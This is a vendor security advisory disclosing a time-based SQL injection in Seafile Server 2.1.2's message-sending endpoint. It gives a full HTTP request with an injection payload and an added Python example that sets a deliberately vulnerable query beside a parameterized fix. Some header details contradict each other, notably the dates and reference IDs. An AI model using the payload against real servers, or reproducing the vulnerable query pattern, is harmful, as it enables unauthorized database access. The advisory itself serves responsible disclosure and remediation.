Advisory ID: SYSS-2014-001
Product: Seafile Server Community Edition
Vendor: Seafile Ltd.
Affected Version(s): until 2.1.2 Linux
Tested Version(s): 2.1.2 Linux, 2.1.3 Linux
Vulnerability Type: SQL Injection
Risk Level: High
Solution Status: None
Vendor Notification: January, 2014
Solution Date: 2014-01-13
Public Disclosure: 2014-01-23
CVE Reference: Not assigned
Author of Advisory: Marcel Mangold, SySS GmbH, https://www.syss.de/advisories/
Document date: 2013-01-07

--------------------------------------------------------------------------------

Overview:

The software suffers from at least one SQL injection vulnerability.

--------------------------------------------------------------------------------

Vulnerability Details:

The script which handles requests to message/message_send/?from=user has a
POST parameter called mass_email that is vulnerable to SQL injection.
(Fixed in version 2.1.3)

--------------------------------------------------------------------------------

Proof of Concept (PoC):

Request:

+------------------------------------
POST /message/message_send/?from=user HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:8000/user/2/msgs/
Content-Length: 120
Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax2zwfbjo51h8ttilp7r7yujrwxeq
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

mass_msg=asdf&mass_email=victim%40sample.xy'+AND+1%3dLIKE('SYSS',UPPER(HEX(RANDOMBLOB(500000000/2))))+AND+'syss'%3d'syss
+------------------------------------

Effect:

The response is delayed. If the value of mass_email is changed to
victim%40sample.xy, the answer is delivered almost instantly. The
vulnerability could be verified using sqlmap [3].
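To make the root cause and the fix concrete, the following is an added example, not Seafile's code: the schema, table and function names are hypothetical. It decodes the PoC body above, shows the defective pattern (request value spliced into the SQL text) next to a parameter-bound query, and adds an allow-list check on mass_email so malformed values are rejected before any SQL runs.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed request bodies: the PoC body from the advisory and the benign
# variant the "Effect" paragraph compares it against (both URL-encoded forms).
POC_BODY = ("mass_msg=asdf&mass_email=victim%40sample.xy'+AND+1%3dLIKE('SYSS',"
            "UPPER(HEX(RANDOMBLOB(500000000/2))))+AND+'syss'%3d'syss")
BENIGN_BODY = "mass_msg=asdf&mass_email=victim%40sample.xy"
# The PoC payload with its slow RANDOMBLOB predicate dropped, so the effect of
# the injected SQL shows up in the result set instead of in response time.
FAST_PAYLOAD = "victim@sample.xy' AND 'syss'='syss"

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def mass_email_from_body(body):
    """Decode the form body and return mass_email as the server would see it."""
    return parse_qs(body)["mass_email"][0]


def validate_mass_email(value):
    """Allow-list check: an address and nothing else; rejects the PoC value."""
    return EMAIL_RE.fullmatch(value) is not None


def make_db():
    # Hypothetical schema standing in for the user table the view queries.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE profiles (email TEXT PRIMARY KEY, nickname TEXT)")
    conn.executemany("INSERT INTO profiles VALUES (?, ?)",
                     [("victim@sample.xy", "Victim"), ("other@sample.xy", "Other")])
    return conn


def lookup_vulnerable(conn, email):
    # Defective pattern: the request value is spliced into the SQL text, so a
    # quote in mass_email ends the literal and the remainder executes as SQL.
    sql = "SELECT nickname FROM profiles WHERE email = '%s'" % email
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, email):
    # Fix: bind the value; SQLite treats the whole string as a single literal.
    return conn.execute("SELECT nickname FROM profiles WHERE email = ?", (email,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, FAST_PAYLOAD))      # [('Victim',)]: injected predicate ran
    print(lookup_parameterized(db, FAST_PAYLOAD))   # []: no such address exists
    print(validate_mass_email(mass_email_from_body(POC_BODY)))  # False
```

With the vulnerable lookup the injected predicate is evaluated by the database, which is exactly the behaviour the delayed response in the PoC depends on; with binding plus validation the value never reaches the SQL parser as code.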
--------------------------------------------------------------------------------

Solution:

Update to version 2.1.3.

--------------------------------------------------------------------------------

Disclosure Timeline:

2014-01-07 - Vulnerability discovered
2014-01-07 - Vulnerability reported to developer
2014-01-08 - Fix committed to GitHub by developer
2014-01-11 - Information about fix sent to me by email
2014-01-13 - Verified fix

--------------------------------------------------------------------------------

References:

[1] SySS GmbH, SYSS-2013-002 - https://www.syss.de/advisories/SYSS-2014-001 - SQL-Injection in Seafile 2.1.2 Server
[2] SySS GmbH, SySS Responsible Disclosure Policy - https://www.syss.de/responsible_disclosure_policy
[3] http://sqlmap.org/

--------------------------------------------------------------------------------

Credits:

Security vulnerability found by Responsible Hacker of the SySS GmbH.

E-Mail: marcel.mangold@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc
Key ID: AC15E5BE
Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE

--------------------------------------------------------------------------------

Disclaimer:

The information provided in this security advisory is provided "as is" and
without warranty of any kind. Details of this security advisory may be updated
in order to provide as accurate information as possible. The latest version of
this security advisory is available on the SySS Web site [1].

--------------------------------------------------------------------------------

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en